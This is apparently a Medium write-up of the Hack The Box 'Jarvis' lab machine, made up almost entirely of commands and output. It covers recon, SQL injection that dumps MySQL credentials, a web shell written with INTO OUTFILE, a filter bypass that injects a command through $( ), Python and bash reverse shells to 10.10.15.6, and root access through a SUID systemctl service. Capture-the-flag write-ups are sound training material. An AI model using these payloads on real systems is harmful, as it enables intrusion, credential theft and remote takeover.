Hack the box: Jarvis

Jarvis

Recon

# nmap -sS -sV -n -O 10.10.10.143 Starting Nmap 7.70 
--snip --
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
80/tcp open http Apache httpd 2.4.25 ((Debian))
-- snip --
# dirb http://10.10.10.143/ /usr/share/wordlists/dirb/common.txt -R
-- snip --
URL_BASE: http://10.10.10.143/
WORDLIST_FILES: /usr/share/wordlists/dirb/common.txt
OPTION: Interactive Recursion
-- snip --
==> DIRECTORY: http://10.10.10.143/css/ ==> DIRECTORY: http://10.10.10.143/fonts/ ==> DIRECTORY: http://10.10.10.143/images/ + http://10.10.10.143/index.php (CODE:200|SIZE:23628) ==> DIRECTORY: http://10.10.10.143/js/ ==> DIRECTORY: http://10.10.10.143/phpmyadmin/

SQL injection in /room.php?cod

1 ORDER BY 7
Injected, working query
1 ORDER BY 8
Injected, broken queru
0 UNION ALL SELECT 1,2,3,4,5,6,7
Numbered columns
0 UNION ALL SELECT 1,user,3,password,host,6,7 FROM mysql.user

Reversing password

Reverse shell

SELECT
"<?php exec(\\"/bin/bash -c 'bash -i >& /dev/tcp/10.10.15.6/443 0>&1'\\"); ?>"
INTO OUTFILE "/var/www/html/images/revshell.php"
# nc -nvlp 443
listening on [any] 443 ...
connect to [10.10.15.6] from (UNKNOWN) [10.10.10.143] 57252
bash: cannot set terminal process group (605): Inappropriate ioctl for device
bash: no job control in this shell
www-data@jarvis:/var/www/html/images$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@jarvis:/var/www/html/images$

Escalate to user

www-data@jarvis:/home/pepper$ stat user.txt
stat user.txt
File: user.txt
Size: 33 Blocks: 8 IO Block: 4096 regular file
Device: 801h/2049d Inode: 655369 Links: 1
Access: (0440/-r--r-----) Uid: ( 0/ root) Gid: ( 1000/ pepper)
Access: 2019-03-05 07:40:37.871997828 -0500
Modify: 2019-03-05 07:11:01.000000000 -0500
Change: 2019-03-05 07:26:01.727994624 -0500
Birth: -
www-data@jarvis:/home/pepper$ sudo -ll
sudo -ll
Matching Defaults entries for www-data on jarvis:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin
User www-data may run the following commands on jarvis:Sudoers entry:
RunAsUsers: pepper
RunAsGroups: ALL
Options: !authenticate
Commands:
/var/www/Admin-Utilities/simpler.py
def exec_ping():
forbidden = ['&', ';', '-', '`', '||', '|']
command = input('Enter an IP: ')
for i in forbidden:
if i in command:
print('Got you')
exit()
os.system('ping ' + command)
echo "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('10.10.15.6',1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(['/bin/sh','-i']);" > /tmp/revshell.py
sudo -u pepper /var/www/Admin-Utilities/simpler.py -p
Enter an IP: $(python /tmp/revshell.py)
# nc -nvlp 1234
listening on [any] 1234 ...
connect to [10.10.15.6] from (UNKNOWN) [10.10.10.143] 48254
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=1000(pepper) gid=1000(pepper) groups=1000(pepper)
$ cat /home/pepper/user.txt
2afa...

Securing user shell

$ echo "ssh-rsa AAAAB3..." >> /home/pepper/.ssh/authorized_key
# ssh pepper@10.10.10.10.143 -c aes256-ctr -i id_rsa

Privlege escalation

$ python linuxprivchecker.py
-- snip --
[+] SUID/SGID Files and Directories
-rwsr-x--- 1 root pepper 174520 Feb 17 2019 /bin/systemctl
-- snip --
[Unit]
Description=Revshell
After=network.target
Type=simple
Restart=always
RestartSec=1
[Service]
User=root
ExecStart=/usr/bin/env python /home/pepper/tellico/revshell.py
ExecStop=echo done
[Install]
WantedBy=multi-user.target
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('10.10.15.6',1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(['/bin/sh','-i']);
pepper@jarvis:~/tellico$ systemctl enable /home/pepper/tellico/revshell.service
pepper@jarvis:~/tellico$ systemctl start revshell.service
# nc -nvlp 1234
listening on [any] 1234 ...
connect to [10.10.15.6] from (UNKNOWN) [10.10.10.143] 53020
/bin/sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)
# cd /root
sqli_defender.py
# cat root.txt
d41...

--

--

--

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

What are Static Libraries?

What are the differences between static and dynamic libraries?

Darwinia Network

10 Python One-Liners That Will Save Your Time

Build a Django RESTful API

Assignment Operator in C

META SPATIAL& WEEHODL

Building an Autoencoder with Tied Weights in Keras

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Tellico Lungrevink

Tellico Lungrevink

More from Medium

TryHackMe ‘Ignite’ Room Walkthrough

Overpass CTF Walkthrough

Post-Exploitation with HackBrowserData.

Crackme.py (PicoCTF Walkthrough